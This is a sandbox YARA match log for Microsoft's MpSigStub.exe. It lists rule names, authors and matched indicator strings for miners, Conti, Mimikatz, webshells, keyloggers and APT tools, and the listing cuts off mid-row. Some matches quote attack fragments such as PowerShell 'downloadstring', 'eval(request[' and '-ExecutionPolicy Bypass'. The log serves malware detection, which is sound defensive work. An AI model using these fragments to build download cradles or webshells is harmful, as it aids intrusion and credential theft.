35.3.MpSigStub.exe.28bd80ae56a.188.raw.unpack	SUSP_Base64_Encoded_Hex_Encoded_Code	Detects hex encoded code that has been base64 encoded	Florian Roth	0x6e39:$x1: 78 34 4E 6A 4E 63 65 44 63 79 58 48 67 0x7644:$x1: 78 34 4E 54 4E 63 65 44 59 7A 58 48 67 0x7654:$x1: 78 34 4E 6A 6C 63 65 44 63 77 58 48 67
35.3.MpSigStub.exe.28bd69007f6.71.raw.unpack	clearlog	Detects Fireball malware - file clearlog.dll	Florian Roth	0x15071:$s3: hhhhh.exe 0x1505b:$s4: ttttt.exe 0x15045:$s6: cle.log.1
35.3.MpSigStub.exe.28bd7ecabce.89.raw.unpack	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x2356e:$s1: stratum+tcp://
35.3.MpSigStub.exe.28bd7ecabce.89.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
35.3.MpSigStub.exe.28bd7ecabce.89.raw.unpack	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
35.3.MpSigStub.exe.28bd772c9ca.108.raw.unpack	Trojan_Win32_PlaKeylog_B	Keylogger component	Microsoft	0x22913:$hook: C6 06 FF 46 C6 06 25 0x2291e:$dasm_engine: 80 C9 10 88 0E 8A CA 80 E1 07 43 88 56 03 80 F9 05
35.3.MpSigStub.exe.28bd772c9ca.108.raw.unpack	APT_DNSpionage_Karkoff_Malware_Apr19_1	Detects DNSpionage Karkoff malware	Florian Roth	0x28412:$x3: rimrun.com
35.3.MpSigStub.exe.28bd772c9ca.108.raw.unpack	DeepPanda_htran_exe	Hack Deep Panda - htran-exe	Florian Roth	0x28d8e:$s15: [+] OK! I Closed The Two Socket.
35.3.MpSigStub.exe.28bd772c9ca.108.raw.unpack	SUSP_DropperBackdoor_Keywords	Detects suspicious keywords that indicate a backdoor	Florian Roth	0x283f1:$x4: DropperBackdoor
35.3.MpSigStub.exe.28bd772c9ca.108.raw.unpack	APT_APT41_POISONPLUG	Detects APT41 malware POISONPLUG	Florian Roth	0x2767b:$s2: [-]write failed[%d] 0x27669:$s3: [-]load failed
35.3.MpSigStub.exe.28bd772c9ca.108.raw.unpack	APT_MAL_HOPLIGHT_NK_HiddenCobra_Apr19_3	Detects HOPLIGHT malware used by HiddenCobra APT group	Florian Roth	0x2ac1d:$s5: emailAddress= 0x2ac0d:$s7: www.naver.com 0x2abdc:$x2: reykfgkodfgkfdskgdfogpdokgsdfpg 0x2abbe:$x3: fjiejffndxklfsdkfjsaadiepwn
35.3.MpSigStub.exe.28bd772c9ca.108.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
35.3.MpSigStub.exe.28bd8041112.117.raw.unpack	Mimikatz_Strings	Detects Mimikatz strings	Florian Roth	0x22f94:$x10: KIWI_MSV1_0_PRIMARY_CREDENTIALS KO
35.3.MpSigStub.exe.28bd8041112.117.raw.unpack	webshell_asp_generic_eval_on_input	Generic ASP webshell which uses any eval/exec function directly on user input	Arnim Rupp	0x2374f:$payload_and_input1: eval(request[ 0x26c84:$tagasp_short1: <%@ 0x26ca9:$tagasp_short1: <%v 0x2e352:$tagasp_short1: <%\xEF 0x5607:$tagasp_short2: %> 0x26ca7:$tagasp_short2: %> 0x305b1:$tagasp_short2: %> 0x39e02:$tagasp_short2: %> 0x3b793:$tagasp_short2: %> 0x26c84:$tagasp_long20: <%@pagelanguage="jscript
35.3.MpSigStub.exe.28bd8041112.117.raw.unpack	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x2355b:$s1: stratum+tcp://
35.3.MpSigStub.exe.28bd8041112.117.raw.unpack	APT_DeputyDog_Fexel	unknown	ThreatConnect Intelligence Research Team	0x1e956:$cUp: Upload failed! [Remote error code:
35.3.MpSigStub.exe.28bd718fe9d.113.raw.unpack	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0xb5eb:$s1: stratum+tcp:// 0xc207:$s1: stratum+tcp://
35.3.MpSigStub.exe.28bd718fe9d.113.raw.unpack	Typical_Malware_String_Transforms	Detects typical strings in a reversed or otherwise modified form	Florian Roth	0x21353:$e3: exe.rerolpxe
35.3.MpSigStub.exe.28bd718fe9d.113.raw.unpack	JoeSecurity_Conti_ransomware	Yara detected Conti ransomware	Joe Security
35.3.MpSigStub.exe.28bd718fe9d.155.raw.unpack	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0xb5eb:$s1: stratum+tcp:// 0xc207:$s1: stratum+tcp://
35.3.MpSigStub.exe.28bd718fe9d.155.raw.unpack	Typical_Malware_String_Transforms	Detects typical strings in a reversed or otherwise modified form	Florian Roth	0x21353:$e3: exe.rerolpxe
35.3.MpSigStub.exe.28bd718fe9d.155.raw.unpack	JoeSecurity_Conti_ransomware	Yara detected Conti ransomware	Joe Security
35.3.MpSigStub.exe.28bd62a62ea.169.unpack	JoeSecurity_Allatori_JAR_Obfuscator	Yara detected Allatori_JAR_Obfuscator	Joe Security
35.3.MpSigStub.exe.28bd62a62ea.169.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
35.3.MpSigStub.exe.28bd62ff37e.139.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
35.3.MpSigStub.exe.28bd62ff37e.139.unpack	JoeSecurity_Winexe_tool	Yara detected Winexe tool	Joe Security
35.3.MpSigStub.exe.28bd62ff37e.139.unpack	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
35.3.MpSigStub.exe.28bd64e41a6.68.raw.unpack	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
35.3.MpSigStub.exe.28bd7421296.110.unpack	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
35.3.MpSigStub.exe.28bd77beebe.25.raw.unpack	SUSP_XMRIG_String	Detects a suspicious XMRIG crypto miner executable string in filr	Florian Roth	0x73df:$x1: xmrig.exe
35.3.MpSigStub.exe.28bd77beebe.25.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
35.3.MpSigStub.exe.28bd7a92f79.137.raw.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0x3fba:$x1: ReflectiveLoader
35.3.MpSigStub.exe.28bd7a92f79.137.raw.unpack	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x56c4:$s1: stratum+tcp://
35.3.MpSigStub.exe.28bd7a92f79.137.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
35.3.MpSigStub.exe.28bd7421296.175.unpack	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
35.3.MpSigStub.exe.28bd677d89d.195.raw.unpack	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
35.3.MpSigStub.exe.28bd700b2de.97.raw.unpack	webshell_asp_generic_eval_on_input	Generic ASP webshell which uses any eval/exec function directly on user input	Arnim Rupp	0x1507b:$payload_and_input1: eval(request. 0xfb7b:$tagasp_short1: <%\xC4 0x147d8:$tagasp_short1: <%\x1D 0x1505b:$tagasp_short1: <%@ 0x15079:$tagasp_short1: <%e 0xc598:$tagasp_short2: %> 0x15079:$tagasp_long13: <%ev
35.3.MpSigStub.exe.28bd680fb5a.198.raw.unpack	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
35.3.MpSigStub.exe.28bd6ea607c.235.raw.unpack	GhostDragon_Gh0stRAT	Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report	Florian Roth	0x1906e:$x4: Http/1.1 403 Forbidden 0x1906e:$s5: Http/1.1 403 Forbidden
35.3.MpSigStub.exe.28bd6ea607c.235.raw.unpack	Typical_Malware_String_Transforms	Detects typical strings in a reversed or otherwise modified form	Florian Roth	0x1ec8d:$e3: exe.rerolpxe 0x3b5ee:$e6: exe.dmc 0x1b729:$r2: nuR\noisreVtnerruC
35.3.MpSigStub.exe.28bd62c2d87.75.raw.unpack	JoeSecurity_Allatori_JAR_Obfuscator	Yara detected Allatori_JAR_Obfuscator	Joe Security
35.3.MpSigStub.exe.28bd7870281.51.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
35.3.MpSigStub.exe.28bd64e4daa.69.raw.unpack	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
35.3.MpSigStub.exe.28bd7098dc6.64.raw.unpack	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x69fd:$s1: stratum+tcp://
35.3.MpSigStub.exe.28bd7098dc6.64.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
35.3.MpSigStub.exe.28bd677fef1.196.raw.unpack	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
35.3.MpSigStub.exe.28bd64bea82.66.raw.unpack	Unspecified_Malware_Sep1_A1	Detects malware from DrqgonFly APT report	Florian Roth
35.3.MpSigStub.exe.28bd62a62ea.73.unpack	JoeSecurity_Allatori_JAR_Obfuscator	Yara detected Allatori_JAR_Obfuscator	Joe Security
35.3.MpSigStub.exe.28bd62a62ea.73.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
35.3.MpSigStub.exe.28bd7ec89ca.192.raw.unpack	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x25772:$s1: stratum+tcp://
35.3.MpSigStub.exe.28bd7ec89ca.192.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
35.3.MpSigStub.exe.28bd7ec89ca.192.raw.unpack	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
35.3.MpSigStub.exe.28bd66afd72.161.raw.unpack	SUSP_Microsoft_7z_SFX_Combo	Detects a suspicious file that has a Microsoft copyright and is a 7z SFX	Florian Roth	0x4b00:$s1: 7ZSfx%03x.cmd 0x849:$c1: 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 A9 00 20 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F ... 0x1459:$c1: 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 A9 00 20 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F ...
35.3.MpSigStub.exe.28bd7361111.94.raw.unpack	HackTool_Samples	Hacktool	unknown	0x23ac1:$c: Failed to load SAM functions
35.3.MpSigStub.exe.28bd7361111.94.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
35.3.MpSigStub.exe.28bd66ae56a.160.raw.unpack	SUSP_Microsoft_7z_SFX_Combo	Detects a suspicious file that has a Microsoft copyright and is a 7z SFX	Florian Roth	0x6308:$s1: 7ZSfx%03x.cmd 0x8b5:$c1: 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 A9 00 20 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F ... 0x1461:$c1: 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 A9 00 20 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F ... 0x2051:$c1: 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 A9 00 20 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F ... 0x2c61:$c1: 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 A9 00 20 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F ...
35.3.MpSigStub.exe.28bd62c32d4.74.unpack	JoeSecurity_Allatori_JAR_Obfuscator	Yara detected Allatori_JAR_Obfuscator	Joe Security
35.3.MpSigStub.exe.28bd62c32d4.74.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
35.3.MpSigStub.exe.28bd62c32d4.74.unpack	JoeSecurity_Winexe_tool	Yara detected Winexe tool	Joe Security
35.3.MpSigStub.exe.28bd62c32d4.74.unpack	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
35.3.MpSigStub.exe.28bd78ce0e6.60.raw.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0x75e3:$s1: http:// 0x9606:$s1: http:// 0xb6ab:$s1: http:// 0xd582:$s1: )551{nn 0xd59a:$s1: http:// 0xf168:$s1: http:// 0xf2a5:$s1: http:// 0xf2c0:$s1: http:// 0xf2df:$s1: http:// 0xf2f9:$s1: http:// 0xf317:$s1: http:// 0xf333:$s1: http:// 0xfa6e:$s1: http:// 0xfa8a:$s1: http:// 0xfab2:$s1: http:// 0xfada:$s1: http:// 0xfb12:$s1: http:// 0xfb9d:$s1: http:// 0x1c1a4:$s1: http:// 0x1d2dc:$s1: http:// 0x1d9c4:$s1: http://
35.3.MpSigStub.exe.28bd7098dc6.214.raw.unpack	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x69fd:$s1: stratum+tcp://
35.3.MpSigStub.exe.28bd7098dc6.214.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
35.3.MpSigStub.exe.28bd640a126.19.raw.unpack	Molerats_Jul17_Sample_5	Detects Molerats sample - July 2017	Florian Roth	0x1327e:$a1: net.webclient).downloadstring 0x13c6f:$a1: net.webclient).downloadstring 0x149dc:$a1: net.webclient).downloadstring 0x132a5:$a2: gist.githubusercontent.com
35.3.MpSigStub.exe.28bd640a126.19.raw.unpack	Suspicious_PowerShell_WebDownload_1	Detects suspicious PowerShell code that downloads from web sites	Florian Roth	0x13277:$s2: system.net.webclient).downloadstring('http
35.3.MpSigStub.exe.28bd718d495.127.raw.unpack	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0xdff3:$s1: stratum+tcp:// 0xec0f:$s1: stratum+tcp://
35.3.MpSigStub.exe.28bd718d495.127.raw.unpack	Typical_Malware_String_Transforms	Detects typical strings in a reversed or otherwise modified form	Florian Roth	0x23d5b:$e3: exe.rerolpxe
35.3.MpSigStub.exe.28bd718d495.127.raw.unpack	JoeSecurity_Conti_ransomware	Yara detected Conti ransomware	Joe Security
35.3.MpSigStub.exe.28bd718e899.115.raw.unpack	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0xcbef:$s1: stratum+tcp:// 0xd80b:$s1: stratum+tcp://
35.3.MpSigStub.exe.28bd718e899.115.raw.unpack	Typical_Malware_String_Transforms	Detects typical strings in a reversed or otherwise modified form	Florian Roth	0x22957:$e3: exe.rerolpxe
35.3.MpSigStub.exe.28bd718e899.115.raw.unpack	JoeSecurity_Conti_ransomware	Yara detected Conti ransomware	Joe Security
35.3.MpSigStub.exe.28bd64e5bae.67.raw.unpack	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
35.3.MpSigStub.exe.28bd8042916.116.raw.unpack	Mimikatz_Strings	Detects Mimikatz strings	Florian Roth	0x21790:$x10: KIWI_MSV1_0_PRIMARY_CREDENTIALS KO
35.3.MpSigStub.exe.28bd8042916.116.raw.unpack	webshell_asp_generic_eval_on_input	Generic ASP webshell which uses any eval/exec function directly on user input	Arnim Rupp	0x21f4b:$payload_and_input1: eval(request[ 0x25480:$tagasp_short1: <%@ 0x254a5:$tagasp_short1: <%v 0x2cb4e:$tagasp_short1: <%\xEF 0x3e03:$tagasp_short2: %> 0x254a3:$tagasp_short2: %> 0x2edad:$tagasp_short2: %> 0x385fe:$tagasp_short2: %> 0x39f8f:$tagasp_short2: %> 0x25480:$tagasp_long20: <%@pagelanguage="jscript
35.3.MpSigStub.exe.28bd8042916.116.raw.unpack	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x21d57:$s1: stratum+tcp://
35.3.MpSigStub.exe.28bd8042916.116.raw.unpack	APT_DeputyDog_Fexel	unknown	ThreatConnect Intelligence Research Team	0x1d152:$cUp: Upload failed! [Remote error code:
35.3.MpSigStub.exe.28bd6f34515.103.raw.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xeb71:$x1: ReflectiveLoader
35.3.MpSigStub.exe.28bd6f34515.103.raw.unpack	HackTool_MSIL_SharPersist_2	unknown	FireEye	0x14de5:$a1: SharPersist.lib 0x14df9:$a2: SharPersist.exe 0x14e0d:$b1: ERROR: Invalid hotkey location option given. 0x14e3e:$b2: ERROR: Invalid hotkey given. 0x14e5f:$b3: ERROR: Keepass configuration file not found. 0x14e90:$b4: ERROR: Keepass configuration file was not found. 0x14ec5:$b5: ERROR: That value already exists in: 0x14eee:$b6: ERROR: Failed to delete hidden registry key. 0x14f1f:$pdb1: \SharPersist\ 0x14f31:$pdb2: \SharPersist.pdb
35.3.MpSigStub.exe.28bd640b52a.18.raw.unpack	Molerats_Jul17_Sample_5	Detects Molerats sample - July 2017	Florian Roth	0x11e7a:$a1: net.webclient).downloadstring 0x1286b:$a1: net.webclient).downloadstring 0x135d8:$a1: net.webclient).downloadstring 0x11ea1:$a2: gist.githubusercontent.com
35.3.MpSigStub.exe.28bd640b52a.18.raw.unpack	Suspicious_PowerShell_WebDownload_1	Detects suspicious PowerShell code that downloads from web sites	Florian Roth	0x11e73:$s2: system.net.webclient).downloadstring('http
35.3.MpSigStub.exe.28bd7886c25.53.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
35.3.MpSigStub.exe.28bd718e899.128.raw.unpack	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0xcbef:$s1: stratum+tcp:// 0xd80b:$s1: stratum+tcp://
35.3.MpSigStub.exe.28bd718e899.128.raw.unpack	Typical_Malware_String_Transforms	Detects typical strings in a reversed or otherwise modified form	Florian Roth	0x22957:$e3: exe.rerolpxe
35.3.MpSigStub.exe.28bd718e899.128.raw.unpack	JoeSecurity_Conti_ransomware	Yara detected Conti ransomware	Joe Security
35.3.MpSigStub.exe.28bd718d495.154.raw.unpack	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0xdff3:$s1: stratum+tcp:// 0xec0f:$s1: stratum+tcp://
35.3.MpSigStub.exe.28bd718d495.154.raw.unpack	Typical_Malware_String_Transforms	Detects typical strings in a reversed or otherwise modified form	Florian Roth	0x23d5b:$e3: exe.rerolpxe
35.3.MpSigStub.exe.28bd718d495.154.raw.unpack	JoeSecurity_Conti_ransomware	Yara detected Conti ransomware	Joe Security
35.3.MpSigStub.exe.28bd7b2bc01.138.raw.unpack	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x995d:$s1: stratum+tcp://
35.3.MpSigStub.exe.28bd7b2bc01.138.raw.unpack	JoeSecurity_bitcoinminer	Yara detected BitCoin Miner	Joe Security
35.3.MpSigStub.exe.28bd80af96e.189.raw.unpack	APT_MAL_Sandworm_Exaramel_Configuration_Key	Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...	FR/ANSSI/SDO	0x9f2e:$: odhyrfjcnfkdtslt
35.3.MpSigStub.exe.28bd80af96e.189.raw.unpack	APT_APT29_sorefang_modify_alphabet_custom_encode	Rule to detect SoreFang based on arguments passed into custom encoding algorithm function	NCSC	0x9956:$: 33 C0 8B CE 6A 36 6A 71 66 89 46 60 88 46 62 89 46 68 66 89 46 64
35.3.MpSigStub.exe.28bd80af96e.189.raw.unpack	SUSP_Base64_Encoded_Hex_Encoded_Code	Detects hex encoded code that has been base64 encoded	Florian Roth	0x5a35:$x1: 78 34 4E 6A 4E 63 65 44 63 79 58 48 67 0x6240:$x1: 78 34 4E 54 4E 63 65 44 59 7A 58 48 67 0x6250:$x1: 78 34 4E 6A 6C 63 65 44 63 77 58 48 67
35.3.MpSigStub.exe.28bd607b3cd.111.raw.unpack	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
35.3.MpSigStub.exe.28bd80af96e.118.raw.unpack	APT_MAL_Sandworm_Exaramel_Configuration_Key	Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...	FR/ANSSI/SDO	0x9f2e:$: odhyrfjcnfkdtslt
35.3.MpSigStub.exe.28bd80af96e.118.raw.unpack	APT_APT29_sorefang_modify_alphabet_custom_encode	Rule to detect SoreFang based on arguments passed into custom encoding algorithm function	NCSC	0x9956:$: 33 C0 8B CE 6A 36 6A 71 66 89 46 60 88 46 62 89 46 68 66 89 46 64
35.3.MpSigStub.exe.28bd80af96e.118.raw.unpack	SUSP_Base64_Encoded_Hex_Encoded_Code	Detects hex encoded code that has been base64 encoded	Florian Roth	0x5a35:$x1: 78 34 4E 6A 4E 63 65 44 63 79 58 48 67 0x6240:$x1: 78 34 4E 54 4E 63 65 44 59 7A 58 48 67 0x6250:$x1: 78 34 4E 6A 6C 63 65 44 63 77 58 48 67
35.3.MpSigStub.exe.28bd80b0d72.190.raw.unpack	APT_MAL_Sandworm_Exaramel_Configuration_Key	Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...	FR/ANSSI/SDO	0x8b2a:$: odhyrfjcnfkdtslt
35.3.MpSigStub.exe.28bd80b0d72.190.raw.unpack	APT_APT29_sorefang_modify_alphabet_custom_encode	Rule to detect SoreFang based on arguments passed into custom encoding algorithm function	NCSC	0x8552:$: 33 C0 8B CE 6A 36 6A 71 66 89 46 60 88 46 62 89 46 68 66 89 46 64
35.3.MpSigStub.exe.28bd80b0d72.190.raw.unpack	SUSP_Base64_Encoded_Hex_Encoded_Code	Detects hex encoded code that has been base64 encoded	Florian Roth	0x4631:$x1: 78 34 4E 6A 4E 63 65 44 63 79 58 48 67 0x4e3c:$x1: 78 34 4E 54 4E 63 65 44 59 7A 58 48 67 0x4e4c:$x1: 78 34 4E 6A 6C 63 65 44 63 77 58 48 67
35.3.MpSigStub.exe.28bd62c32d4.170.unpack	JoeSecurity_Allatori_JAR_Obfuscator	Yara detected Allatori_JAR_Obfuscator	Joe Security
35.3.MpSigStub.exe.28bd62c32d4.170.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
35.3.MpSigStub.exe.28bd62c32d4.170.unpack	JoeSecurity_Winexe_tool	Yara detected Winexe tool	Joe Security
35.3.MpSigStub.exe.28bd62c32d4.170.unpack	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
35.3.MpSigStub.exe.28bd772d1ce.107.raw.unpack	Trojan_Win32_PlaKeylog_B	Keylogger component	Microsoft	0x2210f:$hook: C6 06 FF 46 C6 06 25 0x2211a:$dasm_engine: 80 C9 10 88 0E 8A CA 80 E1 07 43 88 56 03 80 F9 05
35.3.MpSigStub.exe.28bd772d1ce.107.raw.unpack	APT_DNSpionage_Karkoff_Malware_Apr19_1	Detects DNSpionage Karkoff malware	Florian Roth	0x27c0e:$x3: rimrun.com
35.3.MpSigStub.exe.28bd772d1ce.107.raw.unpack	DeepPanda_htran_exe	Hack Deep Panda - htran-exe	Florian Roth	0x2858a:$s15: [+] OK! I Closed The Two Socket.
35.3.MpSigStub.exe.28bd772d1ce.107.raw.unpack	SUSP_DropperBackdoor_Keywords	Detects suspicious keywords that indicate a backdoor	Florian Roth	0x27bed:$x4: DropperBackdoor
35.3.MpSigStub.exe.28bd772d1ce.107.raw.unpack	APT_APT41_POISONPLUG	Detects APT41 malware POISONPLUG	Florian Roth	0x26e77:$s2: [-]write failed[%d] 0x26e65:$s3: [-]load failed
35.3.MpSigStub.exe.28bd772d1ce.107.raw.unpack	APT_MAL_HOPLIGHT_NK_HiddenCobra_Apr19_3	Detects HOPLIGHT malware used by HiddenCobra APT group	Florian Roth	0x2a419:$s5: emailAddress= 0x2a409:$s7: www.naver.com 0x2a3d8:$x2: reykfgkodfgkfdskgdfogpdokgsdfpg 0x2a3ba:$x3: fjiejffndxklfsdkfjsaadiepwn
35.3.MpSigStub.exe.28bd772d1ce.107.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
35.3.MpSigStub.exe.28bd7889079.52.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
35.3.MpSigStub.exe.28bd63ab4aa.184.raw.unpack	XOR_4byte_Key	Detects an executable encrypted with a 4 byte XOR (also used for Derusbi Trojan)	Florian Roth	0x3a9fa:$s1: 85 C9 74 0A 31 06 01 1E 83 C6 04 49 EB F2
35.3.MpSigStub.exe.28bd7098dc6.214.unpack	hacktool_macos_keylogger_logkext	LogKext is an open source keylogger for Mac OS X, a product of FSB software.	@mimeframe	0x1ff49:$a1: logKextPassKey 0xaf1e0:$a1: logKextPassKey 0x1e0ec:$a4: com_fsb_iokit_logKext 0x1ff6c:$a4: com_fsb_iokit_logKext 0x61420:$a4: com_fsb_iokit_logKext 0xaf20e:$b1: logKext Password: 0xaf223:$b2: Logging controls whether the daemon is logging keystrokes (default is on). 0x1ff49:$c1: logKextPassKey 0xaf1e0:$c1: logKextPassKey
35.3.MpSigStub.exe.28bd7098dc6.214.unpack	Mimikatz_Strings	Detects Mimikatz strings	Florian Roth	0xc6971:$x11: \\.\mimidrv
35.3.MpSigStub.exe.28bd7098dc6.214.unpack	PowerShell_Susp_Parameter_Combo	Detects PowerShell invocation with suspicious parameters	Florian Roth	0x48d67:$sa1: -ENC 0xc360:$sc2: -noprofile 0xc623:$sc2: -noprofile 0xf92bf:$sc2: -noprofile 0xc372:$sd2: -noninteractive 0xc635:$sd2: -noninteractive 0xf92d1:$sd2: -noninteractive 0x477e9:$se1: -EP bypass 0x48d4f:$se3: -ExecutionPolicy BypasS
35.3.MpSigStub.exe.28bd7098dc6.214.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
35.3.MpSigStub.exe.28bd7098dc6.214.unpack	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
35.3.MpSigStub.exe.28bd63accb2.185.raw.unpack	XOR_4byte_Key	Detects an executable encrypted with a 4 byte XOR (also used for Derusbi Trojan)	Florian Roth	0x391f2:$s1: 85 C9 74 0A 31 06 01 1E 83 C6 04 49 EB F2
35.3.MpSigStub.exe.28bd718fe9d.129.raw.unpack	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0xb5eb:$s1: stratum+tcp:// 0xc207:$s1: stratum+tcp://
35.3.MpSigStub.exe.28bd718fe9d.129.raw.unpack	Typical_Malware_String_Transforms	Detects typical strings in a reversed or otherwise modified form	Florian Roth	0x21353:$e3: exe.rerolpxe
35.3.MpSigStub.exe.28bd718fe9d.129.raw.unpack	JoeSecurity_Conti_ransomware	Yara detected Conti ransomware	Joe Security
35.3.MpSigStub.exe.28bd67c4b16.150.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
35.3.MpSigStub.exe.28bd67c4b16.150.raw.unpack	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
35.3.MpSigStub.exe.28bd62c2d87.172.raw.unpack	JoeSecurity_Allatori_JAR_Obfuscator	Yara detected Allatori_JAR_Obfuscator	Joe Security
35.3.MpSigStub.exe.28bd7361a65.95.raw.unpack	HackTool_Samples	Hacktool	unknown	0x2316d:$c: Failed to load SAM functions
35.3.MpSigStub.exe.28bd7361a65.95.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
35.3.MpSigStub.exe.28bd6afc36e.65.unpack	Oilrig_IntelSecurityManager_macro	Detects OilRig malware	Eyal Sela (slightly modified by Florian Roth)	0x1b1db:$one6: Shell Environ$("COMSPEC") & " /c
35.3.MpSigStub.exe.28bd6697177.158.unpack	Tofu_Backdoor	Detects Tofu Trojan	Cylance	0xc1418:$a: Cookies: Sym1.0 0xc13b9:$c: 66 0F FC C1 0F 11 40 D0 0F 10 40 D0 66 0F EF C2 0F 11 40 D0 0F 10 40 E0
35.3.MpSigStub.exe.28bd6697177.158.unpack	APT_Backdoor_Win_DShell_3	This rule looks for strings specific to the D programming language in combination with sections of an integer array which contains the encoded payload found within DShell	FireEye	0xc1085:$dlang1: C:\D\dmd2\windows\bin\..\..\src\phobos\std\utf.d 0xc10ba:$dlang2: C:\D\dmd2\windows\bin\..\..\src\phobos\std\file.d 0xc10f0:$dlang3: C:\D\dmd2\windows\bin\..\..\src\phobos\std\format.d 0xc1128:$dlang4: C:\D\dmd2\windows\bin\..\..\src\phobos\std\base64.d 0xc1160:$dlang5: C:\D\dmd2\windows\bin\..\..\src\phobos\std\stdio.d 0xc109a:$dlang6: \..\..\src\phobos\std\utf.d 0xc1197:$dlang6: \..\..\src\phobos\std\utf.d 0xc10cf:$dlang7: \..\..\src\phobos\std\file.d 0xc11b7:$dlang7: \..\..\src\phobos\std\file.d 0xc1105:$dlang8: \..\..\src\phobos\std\format.d 0xc11d8:$dlang8: \..\..\src\phobos\std\format.d 0xc113d:$dlang9: \..\..\src\phobos\std\base64.d 0xc11fb:$dlang9: \..\..\src\phobos\std\base64.d 0xc1175:$dlang10: \..\..\src\phobos\std\stdio.d 0xc121e:$dlang10: 